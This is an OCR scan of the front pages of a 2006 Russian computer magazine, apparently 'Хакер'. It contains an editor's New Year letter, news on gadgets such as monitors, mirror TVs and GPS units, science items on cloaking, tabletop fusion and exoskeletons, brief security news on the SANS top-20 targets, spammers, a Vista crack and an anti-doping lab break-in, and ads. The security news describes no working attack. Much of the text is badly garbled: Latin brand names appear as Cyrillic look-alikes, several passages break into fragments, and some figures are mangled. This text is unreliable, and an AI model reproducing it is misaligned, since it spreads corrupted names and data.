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и е знаю, как для тебя, приятель, а лично для меня Новый год — неод- 
нозначный праздник. 

С одной стороны, 31 декабря и 1 0 последующих дней — прекрас- 
ное время, для того чтобы съездить покататься в горы, построить с 
друзьями на даче высокую снежную крепость, наварить кастрюлю глинтвейна 
или просто уделить время, которого всегда не хватает, близким и друзьям. Это 
очень круто. 

С другой, мне кажется, что этот праздник для многих людей превратился 
в какой-то круговорот стереотипов, из которого они год за годом не могут 
вырваться: караваны женщин носят мешки с едой и питьем, режут одни и те 
же салаты и радуются в 1 2 часов, выпивая шампанское и поедая бутерброды 
с икрой. На самом ли деле для них все это важно — не знаю. Для меня совсем 
не важно: я с большей радостью уеду куда-нибудь, встречу 1 2 часов, скажем, 
за рулем, в трамвае, на склоне в горах или у большого костра в лесу :). По тра- 
диции, хочу тебе пожелать, чтобы ты делал так, как тебе реально хочется, а не 
руководствовался тем, «как принято». 

Есть третья сторона Нового года — повод вспомнить, что за прошедший год 
сделал, на что забил, и подумать, что нужно сделать в новом году. В 2007 году у 
меня очень много планов на журнал. Раскрывать все карты не буду, но скажу, 
что мы собираемся сделать все, чтобы журнал в новом году стал тебе интерес- 
нее в несколько раз. 

Наконец, четвертая сторона Нового года, очень приятная, — подарки. В Новый 
год принято дарить подарки, и, конечно, мы не могли забыть о таком важном че- 
ловеке, как ты :). Чтобы порадовать тебя, мы спрятали в журнале 20 новогодних 
сюрпризов. 



С Новым годом :). 
пікі* 022 , гл. ред. Хакера 
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Плеер Арріе іРосІ прочно завоевал сердца поль- 
зователей во всем мире. Простота его исполь- 
зования и необычный дизайн пришлись по вкусу 
многим. Количество дополнительных устройств для 
ІРосІ исчисляется десятками, начиная от простых 
док-станций и заканчивая одеждой, специально 
созданной для ношения с этим устройством. Ряды 
аксессуаров продолжают пополняться. Сегодня это 
стильные полнофункциональные мониторы от ком- 
пании Ѵіе\д/8опіс — ѴіеѵѵОоскѴХІ 945\д/т и ѴХ2245\л/т 
с диагональю 1 9 и 22 дюйма соответственно. Они 
содержат док-станцию для ІРосІ, 4 порта 013В 2.0, 
считыватель карт памяти «8 в 1 », микрофон, стере- 
одинамики и сабвуфер, то есть ты приобретаешь 
не просто устройство отображения информации, а 
целый набор нужных девайсов, скомпонованных в 
одном корпусе (экономия места) и легких в доступе. 
Оба дисплея имеют широкий экран с соотношением 
сторон 16:10, причем ѴХ2245ѵѵт обеспечивает раз- 
решение 1680x1050, аѴХ1945\л/т — 1440x900. 

В дополнение к этому, динамики 2x2,5 Вт и З-Вт 
сабвуфер обеспечивают высокое качество звука, а 
технология ОрііЗупс улучшает качество изображе- 
ния, поступающего через разные разъемы, включая 
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ВИДЕ0Х0Л0Д 

Когда компании, каждая из которых умеет де- 
лать что-то лучше других, объединяют усилия, то 
результат, как правило, оказывается очень по- 
ложительным. РоѵѵегСоІог делает хорошие виде- 
оплаты, а системы охлаждения отАгсіісСооІіпд не 
дают перегреться многим піогессорЭ* и другим 
устройствам в наших ПК. Віѵжсте ону^ьіпустили 
РоѵѵегСоІог XI 950 РРО, оснаижту кѵлеоом от 
тсііс Сооііпд под названием Ас^Шго Х2. 
о конек — тихая, но эффектиЕІая работа. 

Сама плата выполнена по техпрс] 

^ащается видеопамятью ^^ЯЗ^ 

1 2 Мб и можедюаботать в ре 
не просто, а хит^^- мастер-1 
все соединение берІЫа сео 
тик. Т ак что тебе будет до 
системной плэт^і, подде^ 

Птта оснащена двумя | 
м ѴІѴШтоддері 



Іессу80 нм, ос- 
оъемом256 или 
имеСіюззРіге. Но 
^ртанеѴребуется 
зпециа\ьный мос- 
Ічно двух^идюх л л 
ций этот]! 
кодами Ьѵі, разъ- 
|Рет НОСР, что является 
рудущее. Также в списке 
і ОігесіХ 9с, Ореп 012.0, 
з Ѵізіа. 



РоѵѵегСоІог 



ХАКЕР 12/96/ 06 
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На правах рекламы. 




гѵисвоЕОРт.сом/яиз/зЕсивітѵ 

Місгозоіі 



я безопасности вашей сети 

МісгозоІТ® Маіісіоиз ЗоІТѵѵаге КетоѵаІ То оІ - это свьЕіе 16 миллионов уничтоженных вредоносных 
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Если ты хочешь знать, какая техника будет в моде в бли- 
жайшее время, то ты наверняка мониторишь новостные 
ленты, лазаешь по сайтам производителей и т.д. Но беда в 
том, что пресс-релиз или новость — это всего лишь текст 
и изображения, описанный в них девайс ты не потрога- 
ешь. Поэтому нужно ходить на выставки! Там все вживую, 
без обмана. Например, на выставке МіІІіопаіге Раіг 2006 
компания РНШрз представила свои последние разработки. 
Среди них — зеркальный телевизор Міггог ТѴ 42РМ8822 с 
диагональю 42 дюйма. Устройство поставляется в краси- 
вой рамке, с ней и вешается на стену. Пока не включишь 
режим телевизора, это обычное зеркало, после включе- 
ния превращающееся в І_СЭ-ТѴ. Но если ты не можешь 
оторваться от просмотра любимого клипа, но тебе нужно 
причесаться, то можешь воспользоваться режимом «кар- 
тин ка-в-зеркале» . Вот некоторые технические х а р а к - 
ристики новинки: соотношение сторон — 16:9; 
яркость — 500 кд/м; контрастность — 1000:1; разрешение 
— 1366x768 пикселей; время отклика — 10 мс. 



ЗЕРКАЛЬНЫЙ 

РНІЫР5 




> Воттаквыглядитустройство невидимости для микроволнового диапазона 

Если бы люди были двумерными существами, то уже сегодня могли быть невиди- 
мыми. Г рубо говоря, создать «плащ-невидимку» позволяют фундаментальные 
законы физики и математики. Необходимо только разработать такое покрытие, с 
помощью которого световые волны огибали бы помещенный внутрь него объект, 
что ^сделало бы его невидимым со стороны. Это — только для двумерного мира и 
микроволнового излучения — удалось сделать американским исследователям. 

В основе лежит эффект «искривления пространства», однако реально искривля- 
ется лишь путь электромагнитного излучения, порождая своего рода мираж. Плащ 
'зЗЯтавляетмикррволновь^ лучи огибать цель таким образом, что наблюдателю 
(кото рый обл адает, микроволновый «зрением») кажется, будто в этом месте вооб- 
ще ничего нет, он видит те предметы, что расположены за скрытым объектом. Ма- 
териалы, которые позволяют обращаться со световыми лучами подобным образом, 
в естественном виде в природе не встречаются, и их необходимо еще специально 
проектировать. Чтобы упростить себе задачу, физики пока были вынуждены изго- 
тавливать плащ так, чтобы он срабатывал только в одной плоскости. Эксперимен- 
тальный образец представляет собой цилиндрическую конструкцию небольшой 
высоты диаметром меньше 5 дюймов (13 см), состоящую из ряда концентрических 
колец. Совместное их действие позволяет обводить микроволны вокруг централь- 
ной области, опоясанной медным кольцом. Проблема же с видимым светом состоит 
в том, что экспериментаторам в таком случае придется иметь дело с гораздо мень- 
шими длинами волн. А это в свою очередь означает, что оптические метаматериалы 
■должны быть основаны уже на структурах наномасштаба, создание 
>еще не под силу современным нанотехнологиям. К тому же, чтобы 
стью исчез из вида, укрывающий его плащ должен правильно 
излучением одновременно всех длин волн (то есть различных 
Подобная технология требует гораздо большего количества 
ных и разнородных структур, и пока не ясно, можно ли это 
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ігіѵег 510 анонсирован в черном и черно-белом цветовом 
исполнении. Его достоинствами являются крайне малые 
габариты — 42x30x1 0,8 мм — при весе в 1 7,5 граммов 
и очень стильном дизайне. Среди функциональных 
возможностей числится поддержка различных форматов 
воспроизводимых треков (МРЗ, ѴѴМА, АЗЕ, ООО (включая 
010)), ОІ_ЕЭ-дисплей 1,15 дм, сенсорное управление, ЕМ- 
тюнер, часы с таймером, будильник и диктофон. Не мало 
для такого малыша, правда? Кроме того, он поддерживает 
ЮЗ-теги, работает до 8 часов от одной зарядки аккумуля- 
тора, подключается к компьютеру через порт 118В 2.0 и 
имеет объем встроенной памяти от 1 до 2 Гб. 
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НАСТОЛЬНЫЙ 

ТЕРМОЯД 

Как оказалось, термоядерные реакции синтеза химических элементов 
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> Проекты летающего танка от Атегісап Оупатісз 




в звездах можно изучать в ходе сравнительно простого и дешевого 
настольного эксперимента. Когда речь идет об опытах с ядерными 
превращениями, на ум приходят прежде всего ядерные реакторы или 
ускорители тяжелых ядер, занимающие целое здание. В отличие от 
большинства областей физики, упростить установку, уменьшить ее до 
настольных размеров и тем самым сделать экспериментальную ядер- 
ную физику доступной широкому кругу исследователей долгое время 
не удавалось. Несколько лет назад ситуация кардинально изменилась. 
В пионерских экспериментах ученых из Л иверморской национальной 
лаборатории в США было обнаружено, что под действием мощной вспыш- 
ки лазерного света в кластерах дейтерия (Э2)п протекает термоядерная 
реакция слияния двух ядер дейтерия. Процесс, приводящий к этому, был 
назван «кулоновским взрывом» кластеров. Спустя несколько лет была 
найдена еще одна возможность осуществить термоядерный синтез на 
рабочем столе — на основе пироэлектрического эффекта. Все эти до- 
стижения открывают новую эру в ядерном эксперименте. Энергетический 
выход и дозы радиации в таких настольных экспериментах ничтожны, и 
потому они, с одной стороны, радиационно безопасны, а с другой стороны, 
не представляют интереса для индустрии. Зато в них можно изучать 
условия протекания и свойства самих ядерных реакций — именно то, что 
и требуется физику-экспериментатору. Результаты таких экспериментов 
будут очень полезны и для астрофизики, поскольку слияние ядер дейтерия 
— ключевая реакция в процессе горения звезд. 



ЛЕТАЮЩИЕ 

ТАНКИ 



Если ранее компания Атегісап Эупатісз только сообщала об успеш- 
ных испытаниях тяжелого и бронированного ударного беспилотника 
ВаШеНод 350х и ВаШеНод 1 1 0х для боев в городе, то теперь она пред- 
ставила более подробную информацию о своих разработках, но пока 
еще не сами аппараты. 

Один из разработанных летающих танков - ВаШеНод 1 00х. Эта маши- 
на представляет собой БПЛА с фиксированными несущими поверх- 
ностями, способный действовать в режиме как вертикального, так и 
обычного самолетного взлета и посадки. Это делает возможным его 
применение и на суше, и на море. Длина ВаШеНод 1 00х составляет 3,8 
м; размах крыльев -5,2 м; высота - 1 ,5 м; сухой вес -540 кг; максималь- 
ный взлетный - 1 450 кг; полезная нагрузка - 340 кг; потолок - около 
7000 м. Максимальная скорость - 500 км/ч; крейсерская - 333 км/ч. 
Аппарат предназначен для выполнения широкого круга задач: веде- 
ния разведки, мониторинга местности, целеуказания и штурмовки 
целей. Комплекс ВаШеНод 1 00х включает в свой состав 3 летательных 
аппарата ВаШеНод 1 00х, наземную станцию управления С52, а также 
систему средств связи и обмена данными. Основой конструкции 
является запатентованная Атегісап Эупатісз подъемная система 
на основе ротора с высоким крутящим моментом (НідН Тощие АегіаІ 
Ш, НТАІ_). Вооружение ВаШеНод ЮОх-это ПТУР АѲМ-1 14К НеІІІіге, 
Нубга-70, пулемет М1 34 калибра 7,62 мм. 



і=0^5 1=50^5 

> Так вы глядит «кулоновский взрыв» дейтерия 



> Дисплей из бетона 



БЕТОННЫЕ 



ДИСПЛЕИ НОВОЕ — 
ОВі 



СЛОВО В АРХИТЕКТУРЕ 



Из чего только не делали дисплеи, но не из бетона! Оказывается, еще не все 
потеряно — Лаборатория Инноваций (Іппоѵаііоп І_аЬ) в Дании сообщила о созда- 
нии первого в мире дисплея из бетона. Мировая премьера этого дива состоя- 
лась 1 7 ноября в Университете информационных технологий Копенгагена. 
Новый экран сделан из прозрачного бетона — материала, насыщенногогопти- 
ческими волокнами, которые играют роль пикселей: они пропускают как естес- 
твенный, так и искусственный свет. А источником света может быт 
проектор, установленный за бетонным экраном. Разработчикц 
это «новая концепция, которая изменит строительную отрасль, ар>^ 
и множество других областей». 
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КУРНЫИ 

ИЕНТДЛЯ 

МОБИЛЬНОМ ВИНДЫ 

В то время как одни фирмы создают программы, делающие из твоего 
дырявого писюка непробиваемого хакерами монстра, другие ломают 
Пулову, как повысить безопасность мобіЖок и смартфонов. Второе 
сейчас особенно актуально, так как мобильник уже есть даже у твоего 
престарелого дедушки, а взломщик^йе больше обращают внима- 
і мобильные плат форм ы. Одинмз программных пакетов защиты 
з связи — представленный в прошлом месяце ЗесигеСІіепі 
ІѴІКЬіІе от софтварнои компании СИеск Роіпі: ЗоЙѵѵаге ТесИпоІодіез. 
Набор утилит не только обеспечивает безопасную связь, но и улучша- 
ет ее. Например, поскольку клиент ЗСМ поддерживает постоянный 
коннект по ѴРЫ со шлюзами, во время роутинга нет необходимос- 
ти проводить повторные аутентификации. Также независимо от 
положения клиента мобильник с установленным пакетом самостоя- 
тельно фильтрует находящие поблизости типы сетей, обеспечивая 
безопасное подключение. Есть и другие приятные фишки. Стоимость 
лицензии, совместимой со всеми устройствами МісгозоЙ ѴѴіпбоѵѵз 
МоЬіІе Роскеі РС 2003/ЗЕ и ѴѴіпбоѵѵз МоЬіІе 5.0, при оптовой покупке 
составляет $40. 



^ тедапеѵг 



ЖИЗНЕРАДОСТ 
ИТОГИ 



Г од подходит концу, все подводят итоги. Не отстает от] 

МВД, представившее пресс-релиз о нанесенном в 
интеллектуальной собственности. Указан гцясум/а достигает ни А 
много, ни мало 2,5 миллиардов рублей. Конечно, милиц^^н^юсла 
похвастаться и своими успехами. На прот^ 
авторски)шрав под следствие попали 6,5 тьі 
полови^ привлекли к уголовной ответов 
таі 



ЛЮБИМЫЕ ЦЕЛИ 
ХАКЕРОВ 

ЗАЫЗ Іпзіііиіе не перестает радовать своими исследо- 
ваниями. Итогом одного из последних стал ежегодный 
список из 20-ти самых популярных целей хакеров. 

Он разделен на категории: операционные системы, 
библиотеки ѴѴіпбоѵѵз, интернет-пейджеры, базы данных, 
ІІІМІХ- и ѴѴіпбоѵѵз-сервисы, медиаплееры и т.д., в каждой 
из которых подробно рассматриваются замеченные за 
год критические баги и попытки взлома. Среди стандар- 
тных участников «заезда» , таких как Іпіегпеі Ехріогег и 
МісгозоЙ ОІІісе (за этот год одна только ЗАІМ5 обнаружила 
в нем 45 серьезных дырок), здесь можно найти Мае 05 X 
и особенно пострадавшую в 2006 году систему ѴоІР. По 
результатам исследования, самыми популярными стали 
Обау-атаки, а самыми опасными — 80І_іп]есііоп и сгозз- 
зііе-зегір^іпд. Например, номера кредиток воруют именно 
через ЗОЕ іпіесііоп, внедряя в уязвимые приложения 
специальные скрипты, обеспечивающие доступ к базе. 
Для такого рода атак уязвимы 40% всех сетевых прило- 
жений в интернете, 
аегозз-зііе-зегірііпд 
можно применять к 
80% сайтов. 

Полный список с 
подробными ком- 
ментариями от 5АЫ5 
можно найти на 
уѵѵѵѵѵ.запз.ога/1ор20. 






ТОВАР СЕРТИФИЦИРОВАН 



ЦЕНТР ДОМАШНИХ 

МУЛЬТИМЕДИА 

РАЗВЛЕЧЕНИЙ 

Персональный компьютер ФРОНТ Т-90 (600) на базе передовой 
разработки компании Іпіеі, процессора нового поколения Іпіеі® 
Соге™ 2 Рио - это потрясающее быстродействие в обработке 
информации и максимальная производительность, 
обеспечивающие комфортную работу сразу с несколькими 
ресурсоемкими приложениями и возможность наслаждения 
новейшими разработками мультимедиа-индустрии. 




Два ядра. 
Делай больше. 




ФР * мт 

ѵѵѵѵѵѵ.Ігопірс.ги 
+ 7 ( 495 ) 234-9049 



■ХНОПОГИЯ 

ПОБЕОЫ 



Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, СЫрз, Соге Іпзісіе, Оіаіодіс, ЕіііегЕхргезз, ЕТОХ, РІазііРІІе, І386, І486, І960, ІСОМР, ІпзіапіІР, Іпіеі, логотип Іпіеі, ІпіеІ386, ІпіеІ486, ІпіеІ740, ІпіеЮХ2, ІпіеЮХ4, ІпіеІЗХ2, Іпіеі Соге, Іпіеі Іпзісіе, 
логотип Іпіеі Іпзісіе, Іпіеі. 1_еар аііеаб., логотип Іпіеі. І_еар аііеасі., Іпіеі ЫеіВигзі, Іпіеі ІЧеіМегде, Іпіеі ІЧеІЗІгисіиге, Іпіеі ЗіпдІеРгіѵег, Іпіеі ЗреебЗіер, Іпіеі ЗігаіаРІазіі, Іпіеі Ѵііѵ, Іпіеі ХЗсаІе, ІРЬіпк, Ііапіит, Ііапіит Іпзісіе, МСЗ, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵеЮгіѵе, Рагадоп, РОСііагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, Регіогтапсе аі Уоиг Соттапб, Репііит Іпзісіе, зкоооі, ЗоипсІ Магк, Тііе Сотриіег Іпзісіе., ТЬе Зоигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 



НА ПРАВАХ РЕКЛАМЫ 








УГРОЗА 

«ВТОРОЙ жизни» 

Обитатели онлайнового мираЗесопсІ ЫІе бьют тревогу — 
недавно стало известно о появлении программы СоруВоі, 
позволяющей копировать любые игровые предметы. Чем 
это может грозить экономике, представить нетрудно. 

В ЗесопсІ Ыіе уже давно существует сформировавшийся 
рынок, где можно купить своему персонажу практически 
любые вещи за реальные деньги, а разработкой контента 
для этого виртуального мира занимаются сотни боль- 
ших и малых фирм. Некоторые поставщики и продавцы 
виртуальных вещиц начали прикрывать свои лавочки, 
опасаясь инфляции, связанной с появлением СоруВор 
но насколько серьезными окажутся последствия, пока 
сказать трудно. Все зависит от действий разработчиков 
— компании Ыпсіеп І_аЬ. 

ЗесопсІ ЫТе — один из крупнейших виртуальных миров, 
насчитывающий 1 ,5 миллиона постоянных обитателей. 



АѴЕ— НОВЫЙ ЗВУК 




Приятно, когда на рынке, уже известном и привычном, 
вдруг появляется что-то новое. Так произошло и сейчас: 
известная своими аудиорешениями компания АѴЕ пред- 
ставляет новую серию колонок — ЭЕ. Пока в нее входят 
3 модели: АѴЕ ЭЕ102, ЭЕ104 и флагманская ЭЕ106. Уни- 
кальная особенность колонок серии АѴЕ ЭЕ заключается 
в использовании пассивных радиаторов. Это техническое 
решение весьма дорого и редко используется в мульти- 
медиа-акустике. Кроме того, из колонок исключены все 
потенциальные источники помех, шумов и других неже- 
лательных явлений. В частности, АѴЕ ЭЕ имеют вместо 
обычного темброблока специальный блок тонкомпенса- 
ции, автоматически настраивающийся в зависимости от 
уровня громкости. В свою очередь, регулятор громкости, 
для того чтобы избежать шумов, вносимых традиционным 
переменным резистором, выполнен в виде электронного 



сгсеЛтіѵе 




ЛУЧШЕЕ В МИРЕ ЗВУКА 

• Двухполосные сателлиты мощностью 50 Ватт ВМ5 

• Деревянный сабвуфер мощностью 26 Ватт ВМ5 

• Идеальное решение для игр, домашнего 
кинотеатра и прослушивания музыки 




Ш5РІКЕ® 



Т6100 

ѵѵѵѵѵѵ.сгеаііѵе.ги 



© СоругідЫ: 2006. СгеаДѵе ТесЬпоІоду Ш. 

Сгеайѵе является зарегистрированной торговой маркой Сгеаііѵе ТесМпоІоду ЫсІ. 
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Ты знаешь, что глобальное потепление — одна из тех страшных историй, кото- 
рыми нас пугают ученые. И не напрасно, поскольку остановить его практически 
невозможно. Роджер Энджел, один из астрономов с кафедры астрономии Универ- 
ситета Аризоны, предложил экзотический способ борьбы с глобальным потепле- 
нием — гигантский космический зонтик. 

Реализация плана Энджела заняла бы 25 лет и обошлась бы в $1 00 миллиардов 
за каждый год работы. Однако по некоторым оценкам, потери мировой экономики 
из-за неблагоприятных эффектов глобального потепления с настоящего времени 
по 2050 год (при условии, что никакие меры не будут приняты) составят $7 трилли- 
онов. 

Энджел предлагает затенить Землю при помощи 20 триллионов спутников весом 1 
грамм и диаметром примерно 0,6 метра (как серебристый воздушный шарик), выве- 
денных на высоту порядка 1 ,5 миллиона километров в точку Лагранжа І_1 . Они должны 
сформировать облако цилиндрической формы, с осью, лежащей на линии «Солнце 
— Земля». Диаметр облака составит около 7 тысяч километров, а длина — примерно 
1 4 тысяч километров. Свет солнца, проходящий сквозь облако, частично отклонится 
в сторону, так что освещенность земной поверхности упадет на пару процентов, чего 
должно хватить для компенсации глобального потепления. Подробнее — в слушаниях 
Американской национальной академии наук(РІМАЗ). 

Пока неясно, как производить запуск такого количества космических аппаратов. В 
целом же, несмотря на экзотический подход, проект довольно здравый. 



> Воттакие зонтики могут 
отвести он нашей планеты 
надвигающуюся катает- 
рофу 




ГОРЯЧАЯ 

СПАМЕРСКАЯ 

ДЕСЯТКА 

Проект ЗратНаиз, занимающийся исследованиями в 
области нежелательной рекламы, опубликовал на своем 
сайте ТОРЮ самых злостных спамеров мира. Эти 1 0 че- 
ловек несут ответственность за 80% спама, проходящего 
через интернет. На первом месте оказался украинец 
Алекс Поляков, известный как АІех ВІооб — владелец 
крупнейшей спамерской бот-сети. Особенно много 
от этого спамера исходит рекламы сайтов детской 
порнографии и фармацевтической продукции, также 
он является одним из крупнейших распространителей 
вирусов и троянов. Второе место за русским мужичком, 
именующим себя Леонид Куваев ака ВасІСоѵѵ. Он тоже 
владеет бот-сетью, помимо этого он имеет ЭИЗ-сервис и 
предоставляет его другим спамерам. ВасІСоѵѵ известен 
скупкой огромного количества доменов для использова- 
ния в дальнейшей спам-деятельности, а сейчас он скры- 
вается от многомиллионного судебного иска. Т ретье 
место было присуждено американцу Майклу Линдсею, 
отцу-основателю печально известного хостера іМесІіа 
Ыеіѵѵогкз, который предоставляет спамерам всевоз- 
можные услуги и обещает защиту от преследователей. 
Среди остальных гениев спамерского мира еще 3-е 
русских, украинец, жители Израиля, Г онконга и Штатов. 
Досье на спамеров можно почитать на ѵѵѵѵѵѵ.зратіпаиз. 
ога/зіаіізіісз/зраттегз.Іаззо . 




Исследователи Института ядерной физики Макса Планка (Мах РІапск Іпзіііиіе Юг 
Ыисіеаг РИузісз) впервые смогли получить изображение движущейся молекулы 
водорода. Естественно, обыкновенная световая оптика не подходит для фото- 
графирования молекул водорода, так как их размер в 5 тысяч раз меньше длины 
волны видимого света. Поэтому ученым пришлось создать специальный метод 
записи. 

ізучили систему из двух молекул дейтерия (тяжелого водорода), которые 
али высокочастотным лазером. Измеряя энергию взаимодействия, иссле- 
аели определили расстояние между молекулами, а при компьютерной обра- 
;е этих данных было получено графическое изображение. Меняя интервал 
іжду импульсами, ученые смогли получить различные изображения распо- 
ожения молекул. Серия таких снимков составила «молекулярный фильм», 
■Ьторый дает некоторое представление о динамике молекул. 



> Молекула воды 



/ 012 



МОЛЕКУЛЯРНОЕ 

КИНО 



— модель и кадр из «видеозаписи» 
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ЕТ НАІ.-5 
Н НА ПОТОК 



>Японский экзоскелет поможет нетолько военным, но и инвалидам 



Разнообразные варианты экзоскелетов уже не раз появлялись на публи- 
ке. Однако ни один из них не был пущен в серийное производство. Самым 
оптимальным по компактности, автономности и стоимости на сегодняшний 
день остается японский экзоскелет НАІ_-5 (НуЬгісІ Аззізііѵе І_ітЬ), созданный 
инженером Йошиюки Санкая, работающим в университете города Цукуба. 
Как сообщили конструкторы университета, он полностью готов к серийному 
производству. 

Разрабатывали серию НАІ_ 1 0 лет, и вот только в 2007 году первые роботизо- 
ванные костюмы появятся на рынке. Первоначально планируется выпустить 
всего 20 штук, в 2008 году увидят свет уже 400-500 экзоскелетов. Цена на 
НАІ_-5 выше ранее заявленной (около 1 5 тысяч долларов) и составляет от 
42273-х до 59182-х долларов в зависимости от модификаций. Однако возмож- 
на месячная аренда экзоскелета за плату в размере всего 600 долларов. 

По устройству НАІ_-5 представляет собой классический экзоскелет. Это облег- 
ченный механический костюм с многочисленными датчиками, который человек 
надевает на себя. Костюм содержит ряд электрических приводов, которые поз- 
воляют поднимать до 1 00 кг веса, при этом для человека такая нагрузка окажется 
незаметной. Кроме поцн^ия тяжестей, экзоскелет сможет облегчить перемеще- 
ние инвалидам. 



АНТИДОПИНГОВАЯ 
ЛАБОРАТОРИЯ В РУКАХ 
ХАКЕРОВ 

Неприятный инцидент произошел вокруг французской 
антидопинговой лаборатории Шатне-Малабри. Неиз- 
вестные хакеры взломали внутреннюю сеть и получили 
доступ к базам данных об анализах спортсменов. Узнав о 
происшествии, ученые тут же обратились за помощью к 
французскому правительству, убеждая чиновников, что 
последствия могут быть очень плачевными. Опасения 
подтвердились — хакеры связались с Международным 
олимпийским комитетом и с Всемирным антидопинго- 
вым агентством и сообщили об утечке информации из 
французской лаборатории. Мотивы понятны — взломщи- 
ки хотели дискредитировать французов, и вероятно не 
последнюю роль в этом сыграли недавние события: после 
окончания гонки «Тур де Франс» лаборатория Шатне-Ма- 
лабри объявила о высоком уровне тестостерона в крови 
победителя, хотя тот категорически отказался признать 
употребление каких-либо препаратов. Как оно было на 
самом деле, теперь уже вряд л и узнать, но хакеры своего 
добились — вокруг лаборатории образовался скандал. 



НТІЛІРОТОНАМИ 

ТОЧКАМ! 



цеством, оказывается, мд^кно не толь- 
^авляті/фотонные ракеты Лю и лечить 
Р^^юектІСЕ (Апііргюіоп СеІІ Еж^гітепі, 
уквал ь н о іАп е р е во д е -^^ти п Іо^і н ы й 
клеточный экЩ^ЯИ^нт») — одно ^е/іервых 
^дований в облас^^оздейств/я анти- 
Ьтонов на живую ткань. ГШвдвашІітельные 
^итоги работы по проекту сви Шшш етв\1 
р том, что ученым удалорьюдел^ИВаЖ^ій 
иаг на пути создациянового мѳтіаЖчения 
рака 

Суть і<Р|^цекта»^тоит в тЩ, чт^ыЩ^енить в 
ні ігп ппгі ііітта^тгррнпіт и іг анти- 



частицами - антипротонами. Антипротоны по 
отношению к протонам являются античасти- 
цами. Особенность антипротона в том, что 
при столкновении с протоном происходит их 
взаимное уничтожение. 

В ходе экспериментов исследователи про- 
искали поток частиц через трубку с тканями 
Ійяка, а затем подсчитывали, сколько кпе- 
тбк умирало по ее длине. В итоге выяснилось, 
что одинаковое количество действующих 
частиц (протонов и антипротонов) приводит 
к разным результатам: при использовании 
антипротонов на дальнем конце трубки 



поврежденных клеток оказалось в 3,75 раза 
больше, чем при использовании протонов. 
Чтобы получить одно и то же число разру- 
шенных клеток, антипротонов требуется в 4 
раза меньше, чем протонов. Благодаря этому 
можно существенно сократить повреждения 
в ткани на пути пучка. Именно из-за превос- 
ходной способности антипротонов избира- 
тельно разрушать ткани, уничтожая требу- 
емые области и не затрагивая остальные, 
использование пучков этих частиц может 
оказаться особенно ценным при лечении 
раковых опухолей. 
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КТО ВЗЛОМАЛ ВИСТУ? 



Пока МісгозоЙ только готовится к тиражированию ли- 
цензионных версий ѴѴіпбоѵѵз Ѵізіа, пиринговые сети уже 
трещат от пиратских версий дистрибутива. Причем это не 
какие-то демоверсии, а полноценный рабочий вариант. 
Хотя о защите Висты мелкомягкие чуть лине легенды 
слагают, ее удалось обойти. Для этого пришлось заменить 
несколько компонентов из релизной версии более ранни- 
ми. МісгозоЙ в курсе утечки и комментирует это так: «Все 
эти версии — не полноценные и могут кишеть ошибками. 
Также они используют для активации ключи рге-ЯТМ, ко- 
торые будут вскоре заблокированы, и пиратские версии 
просто перестанут работать». С уже гуляющими в Сети 
версиями все понятно, но как МісгозоЙ будет бороться 
со взломанными дистрибутивами, когда они поступят в 
официальную продажу, узнаем после Нового года после 
появления Висты на прилавках. 



АІ.ВАТКОЫ 

ПОДДЕРЖИВАЕТ РІРЕСТХ 10 



Сейчас среди вендоров считается хорошим тоном объявлять о совместимости 
своего железа с грядущей ѴѴіпсІоѵѵз Ѵізіа. Слова «Ѵізіа Реабу» или подобные им 
оказывают на пользователей поистине магическое воздействие. Именно такая 
фраза украшает коробки с новыми видеоплатами от компании АІЬаігоп. Но не 
только она. Еще эти устройства работают с ОігесіХ 10 и ЗНасІег МобеІ 4.0! 
Основаны эти видеоплаты на графических процессорах ЫѴЮІА 8800ѲТХ и 
8800СТЗ, частоты работы ОРІІ составляют 575 и 500, а памяти — 900 и 800 МГц 
соответственно. Если тебе этого покажется мало, то ты можешь создать на их 
основе 5І_І-конфигурацию, они обе это поддерживают. В общем, это отличный 
выбор для геймеров, которые смотрят в будущее и имеют средства для покупки 
современнейших девайсов. 




Ѵ—'У 
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М5-970 

• Мощный сабвуфер 

* Чистые верха 

■ С верх- высокая детализация 

• Профессиональные настройки 

* Глубокий бас 

на любом уровне громкости 
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Информаиип о товаре по телефону; 
+7 (456) 22-ЗМ45 
На правах рекламы 













Историческая справка: 

ПервыЙопутниксистемыЫАѴЗТАВ был запущен 




1978 году. ^ нрмногим меньше тонны и 

Радиопередатник^еетмо^с 

^он^ио^ 
частотой 1575,42 МГц «^ *• 
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ТЕСТ СПУТНИКОВЫХ НАВИГАТОРОВ ДЛЯ ТУРИСТОВ 



В ДЕТСТВЕ МЫ ВСЕ ЛЮБИЛ И ПУТЕШЕСТВОВАТЬ, И ЗОНА ПОИСКОВ ЧЕГО-ТО НОВОГО ОГРАНИЧИВАЛАСЬ СВОБОДНЫМ ВРЕМЕНЕМ. 
СТАВ БОЛЬШИМИ И ВАЖНЫМИ, МЫ ЗАЧАСТУЮ ЕДЕМ НА НОВОЕ МЕСТО, УСЛЫШАВ О НЕМ ОТ ДРУЗЕЙ, ЗНАКОМЫХ ИЛИ ПРОСТО 
ПРОЧИТАВ О НЕМ В ИНТЕРНЕТЕ. ПОПУЛЯРНОЕ РАЗВЛЕЧЕНИЕ «ГЕОКЭШИНГ» СТАЛО ВОЗМОЖНЫМ ИМЕННО БЛАГОДАРЯ УПРО- 
ЩЕНИЮ ПРОЦЕССА НАВИГАЦИИ. НУ, А ЧТО ТАКОЕ ОРЗ И КАК ЕГО ИСПОЛЬЗОВАТЬ В СВОИХ ЦЕЛЯХ, СЕЙЧАС РАЗБЕРЕМСЯ. 



О Что такое 6 Р5? 

ОРЗ — аббревиатура от ОІоЬаІ Розіііопіпд 
Зузіет. Необходимо сказать, что создана она 
при министерстве обороны США. Система 
глобального позиционирования позволяет 
с очень высокой точностью определять 
координаты твоего местоположения, даже 
если ты движешься с большой скоростью 
на любой высоте. Спутниковая навигация 
называется так именно потому, что приемник 
вычисляет свои координаты, получая сигналы 
от спутников. 

□ Как работает спутниковая навигация? 

Чтобы ты не потерялся на местности, 24 спут- 
ника находятся на шести орбитах (то есть на 



постоянном удалении от Земли) и движутся 
со скоростью 3 км/с, а сеть наземных уста- 
новок корректирует данные и отслеживает 
положение станций в космосе. 

Что происходит дальше? Спутник постоян- 
но отправляет информацию, содержащую 
точные время и дату, идентификатор, свои 
координаты и координаты остальных косми- 
